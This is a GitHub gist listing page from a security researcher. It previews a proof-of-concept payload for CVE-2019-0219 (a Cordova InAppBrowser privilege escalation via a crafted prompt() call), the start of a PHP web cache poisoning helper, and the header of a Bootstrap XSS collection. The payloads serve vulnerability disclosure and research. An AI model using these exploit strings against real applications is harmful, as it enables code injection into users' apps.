Skip to content

Instantly share code, notes, and snippets.

View BlackFan's full-sized avatar
🙁

Sergey Bobrov BlackFan

🙁
View GitHub Profile
@BlackFan
BlackFan / CVE-2019-0219_PoC.md
Last active July 16, 2020 05:03
CVE-2019-0219 PoC

Apache Cordova InAppBrowser Privilege Escalation

CVE-2019-0219

<script>
alert('InAppBrowser alert \n window.cordova = ' + JSON.stringify(window.cordova));

prompt("","gap-iab://InAppBrowser'-alert('MainWebview alert \\n window.cordova = ' + JSON.stringify(window.cordova))-'")
</script>
@BlackFan
BlackFan / webcachepoisoning.php
Last active June 17, 2024 04:05
webcachepoisoning.php
<?php
$attack_url = $_GET['url'];
$payload = $_GET['payload'];
$ch = curl_init();
if(isset($_SERVER['HTTP_ACCEPT'])) {
$headers[] = 'Accept: '.$_SERVER['HTTP_ACCEPT'];
}
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active June 17, 2024 04:09
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();